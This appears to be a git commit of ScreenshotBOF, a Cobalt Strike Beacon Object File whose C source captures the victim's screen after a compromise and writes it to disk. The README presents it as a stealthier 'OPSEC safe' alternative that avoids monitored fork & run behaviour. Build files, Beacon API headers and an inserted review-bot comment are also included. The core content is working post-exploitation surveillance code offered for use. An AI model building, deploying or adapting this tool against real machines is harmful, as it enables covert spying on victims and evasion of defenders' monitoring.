first commit
a32d082895
@ -0,0 +1 @@
|
|||
/.vs
|
|
@ -0,0 +1,21 @@
|
|||
# ScreenshotBOF
|
||||
|
||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
||||
|
||||
## Usage
|
||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||
2. use the command screenshot_bof
|
||||
3. Download the screenshot from the target e.g.
|
||||
```
|
||||
download screenshot.bmp
|
||||
```
|
||||
|
||||
## Notes
|
||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||
- in memory downloading of screenshots is planned to be added
|
||||
- the filename can be changed in the source code.
|
||||
|
||||
## Why did I make this?
|
||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command.
|
||||
While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more
|
||||
OPSEC safe version of the screenshot capability.
|
|
@ -0,0 +1,37 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30517.126
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
BOF|x64 = BOF|x64
|
||||
BOF|x86 = BOF|x86
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,277 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="BOF|Win32">
|
||||
<Configuration>BOF</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="BOF|x64">
|
||||
<Configuration>BOF</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{c04ab0f3-f7e1-4996-9cfa-d1337332ef29}</ProjectGuid>
|
||||
<RootNamespace>ScreenshotBOF</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>ScreenshotBOF</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<ConfigurationType>Console</ConfigurationType>
|
||||
<EnableASAN />
|
||||
<SpectreMitigation />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ConfigurationType>Console</ConfigurationType>
|
||||
<!-- This is hack to skip the linking process for our BOF config -->
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<EnableASAN />
|
||||
<SpectreMitigation />
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
|
||||
<CopyLocalDeploymentContent />
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<IntDir>intermediary\$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName)x64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
|
||||
<CopyLocalDeploymentContent />
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)x32</TargetName>
|
||||
<IntDir>intermediary\$(Configuration)\x86\</IntDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>EnableAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalOptions>
|
||||
</AdditionalOptions>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level4</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
<AdditionalOptions>
|
||||
</AdditionalOptions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>EnableAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level4</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ClCompile>
|
||||
<AdditionalOptions>/c /Fo"intermediary\BOF\x64\source"</AdditionalOptions>
|
||||
<WarningLevel>
|
||||
</WarningLevel>
|
||||
<DebugInformationFormat>None</DebugInformationFormat>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild />
|
||||
<ExceptionHandling />
|
||||
<RuntimeLibrary />
|
||||
<FloatingPointModel />
|
||||
<TreatWChar_tAsBuiltInType />
|
||||
<ForceConformanceInForLoopScope />
|
||||
<RemoveUnreferencedCodeData />
|
||||
<ModuleOutputFile />
|
||||
<SuppressStartupBanner />
|
||||
<CallingConvention />
|
||||
<AssemblerOutput />
|
||||
<AssemblerListingLocation />
|
||||
<UseFullPaths />
|
||||
<ErrorReporting />
|
||||
<PrecompiledHeaderOutputFile />
|
||||
<DiagnosticsFormat />
|
||||
<Optimization>
|
||||
</Optimization>
|
||||
<ProgramDataBaseFileName />
|
||||
<TreatWarningAsError />
|
||||
<XMLDocumentationFileName />
|
||||
<FavorSizeOrSpeed>
|
||||
</FavorSizeOrSpeed>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<PostBuildEvent>
|
||||
<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*";
|
||||
powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<ClCompile>
|
||||
<AdditionalOptions>/c /Fo"intermediary\BOF\x86\source"</AdditionalOptions>
|
||||
<WarningLevel>
|
||||
</WarningLevel>
|
||||
<DebugInformationFormat>None</DebugInformationFormat>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild />
|
||||
<ExceptionHandling />
|
||||
<RuntimeLibrary />
|
||||
<FloatingPointModel />
|
||||
<TreatWChar_tAsBuiltInType />
|
||||
<ForceConformanceInForLoopScope />
|
||||
<RemoveUnreferencedCodeData />
|
||||
<ModuleOutputFile />
|
||||
<SuppressStartupBanner />
|
||||
<CallingConvention />
|
||||
<AssemblerOutput />
|
||||
<AssemblerListingLocation />
|
||||
<UseFullPaths />
|
||||
<ErrorReporting />
|
||||
<PrecompiledHeaderOutputFile />
|
||||
<DiagnosticsFormat />
|
||||
<Optimization />
|
||||
<ProgramDataBaseFileName />
|
||||
<TreatWarningAsError />
|
||||
<XMLDocumentationFileName />
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<PostBuildEvent>
|
||||
<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*";
|
||||
powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }"
|
||||
</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Source.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="beacon.h" />
|
||||
<ClInclude Include="bofdefs.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="resources\strip_bof.ps1" Visible="false" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
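Review bot: The comment `<!-- This is hack to skip the linking process for our BOF config -->` in the `BOF|x64` Configuration PropertyGroup sits on a group that contains no such hack; what actually stops the link step is the `/c` in `<AdditionalOptions>/c /Fo"intermediary\BOF\x64\source"</AdditionalOptions>` of the `BOF|x64` and `BOF|Win32` ItemDefinitionGroups, so the comment should move next to those lines (and be present in both). While there, the two `<PostBuildEvent>` commands run `powershell -ExecutionPolicy Unrestricted` on a script whose path is derived from `$(SolutionDir)`; a short comment stating that the strip step is a developer-machine post-build action and what `strip_bof.ps1` removes from the object would make the build's trust assumptions explicit. `<BufferSecurityCheck>false</BufferSecurityCheck>` also deserves a one-line comment saying it is required because the BOF has no CRT security-cookie support, so it is not mistaken for an oversight later.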
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{f23d5754-25e5-46a9-b783-8685f48d2291}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{72263c50-a87a-4d99-9746-3def65c61180}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Resources">
|
||||
<UniqueIdentifier>{999efb6a-e35d-49fb-bf81-1ebab5077dd0}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Source.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="beacon.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="bofdefs.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="resources\strip_bof.ps1">
|
||||
<Filter>Resources</Filter>
|
||||
</Text>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
</Project>
|
|
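--- /dev/null
+++ b/ScreenshotBOF/Source.cpp
@@ -0,0 +1,151 @@
+#include <windows.h>
+#include <stdio.h>
+#include "bofdefs.h"
+#pragma comment(lib, "User32.lib")
+#pragma comment(lib, "Gdi32.lib")
+
+
+
+#pragma region error_handling
+#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
+BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
+#ifdef BOF
+BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
+#else
+printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
+#endif // BOF
+
+return FALSE;
+}
+#pragma endregion
+
+
+BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
+{
+HDC hDC;
+int iBits;
+WORD wBitCount;
+DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
+BITMAP Bitmap0;
+BITMAPFILEHEADER bmfHdr;
+BITMAPINFOHEADER bi;
+LPBITMAPINFOHEADER lpbi;
+HANDLE fh, hDib, hPal, hOldPal2 = NULL;
+hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
+iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
+DeleteDC(hDC);
+if (iBits <= 1)
+wBitCount = 1;
+else if (iBits <= 4)
+wBitCount = 4;
+else if (iBits <= 8)
+wBitCount = 8;
+else
+wBitCount = 24;
+GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
+bi.biSize = sizeof(BITMAPINFOHEADER);
+bi.biWidth = Bitmap0.bmWidth;
+bi.biHeight = -Bitmap0.bmHeight;
+bi.biPlanes = 1;
+bi.biBitCount = wBitCount;
+bi.biCompression = BI_RGB;
+bi.biSizeImage = 0;
+bi.biXPelsPerMeter = 0;
+bi.biYPelsPerMeter = 0;
+bi.biClrImportant = 0;
+bi.biClrUsed = 256;
+dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
+* Bitmap0.bmHeight;
+hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
+lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
+*lpbi = bi;
+
+hPal = GetStockObject(DEFAULT_PALETTE);
+if (hPal)
+{
+hDC = GetDC(NULL);
+hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
+RealizePalette(hDC);
+}
+
+
+GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
++ dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS);
+
+if (hOldPal2)
+{
+SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
+RealizePalette(hDC);
+ReleaseDC(NULL, hDC);
+}
+
+fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
+FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
+
+if (fh == INVALID_HANDLE_VALUE)
+return FALSE;
+
+bmfHdr.bfType = 0x4D42; // "BM"
+dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
+bmfHdr.bfSize = dwDIBSize;
+bmfHdr.bfReserved1 = 0;
+bmfHdr.bfReserved2 = 0;
+bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
+
+WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
+
+WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
+GlobalUnlock(hDib);
+GlobalFree(hDib);
+CloseHandle(fh);
+return TRUE;
+}
+
+#ifdef BOF
+void go(char* buff, int len) {
+BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
+int x1, y1, x2, y2, w, h;
+// get screen dimensions
+x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
+y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
+x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
+y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
+w = x2 - x1;
+h = y2 - y1;
+
+// copy screen to bitmap
+HDC hScreen = GetDC(NULL);
+HDC hDC = CreateCompatibleDC(hScreen);
+HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
+HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
+BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
+
+//I was going to pull from the clipboard but then realized it
+//was more trouble than it was worth, so I just saved it to a file. ~ CodeX
+
+// save bitmap to clipboard
+OpenClipboard(NULL);
+EmptyClipboard();
+SetClipboardData(CF_BITMAP, hBitmap);
+CloseClipboard();
+
+BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
+LPCSTR filename = "screenshot.bmp";
+SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
+
+BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
+// clean up
+SelectObject(hDC, old_obj);
+DeleteDC(hDC);
+ReleaseDC(NULL, hScreen);
+DeleteObject(hBitmap);
+}
+
+
+#else
+
+void main(int argc, char* argv[]) {
+
+}
+
+#endif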
@ -0,0 +1,63 @@
|
|||
#pragma once
|
||||
|
||||
/*
|
||||
* Beacon Object Files (BOF)
|
||||
* -------------------------
|
||||
* A Beacon Object File is a light-weight post exploitation tool that runs
|
||||
* with Beacon's inline-execute command.
|
||||
*
|
||||
* Cobalt Strike 4.1.
|
||||
*/
|
||||
|
||||
/* data API */
|
||||
typedef struct {
|
||||
char * original; /* the original buffer [so we can free it] */
|
||||
char * buffer; /* current pointer into our buffer */
|
||||
int length; /* remaining length of data */
|
||||
int size; /* total size of this buffer */
|
||||
} datap;
|
||||
|
||||
DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size);
|
||||
DECLSPEC_IMPORT int BeaconDataInt(datap * parser);
|
||||
DECLSPEC_IMPORT short BeaconDataShort(datap * parser);
|
||||
DECLSPEC_IMPORT int BeaconDataLength(datap * parser);
|
||||
DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size);
|
||||
|
||||
/* format API */
|
||||
typedef struct {
|
||||
char * original; /* the original buffer [so we can free it] */
|
||||
char * buffer; /* current pointer into our buffer */
|
||||
int length; /* remaining length of data */
|
||||
int size; /* total size of this buffer */
|
||||
} formatp;
|
||||
|
||||
DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz);
|
||||
DECLSPEC_IMPORT void BeaconFormatReset(formatp * format);
|
||||
DECLSPEC_IMPORT void BeaconFormatFree(formatp * format);
|
||||
DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len);
|
||||
DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...);
|
||||
DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size);
|
||||
DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
|
||||
|
||||
/* Output Functions */
|
||||
#define CALLBACK_OUTPUT 0x0
|
||||
#define CALLBACK_OUTPUT_OEM 0x1e
|
||||
#define CALLBACK_ERROR 0x0d
|
||||
#define CALLBACK_OUTPUT_UTF8 0x20
|
||||
|
||||
DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
|
||||
DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
|
||||
|
||||
/* Token Functions */
|
||||
DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
|
||||
DECLSPEC_IMPORT void BeaconRevertToken();
|
||||
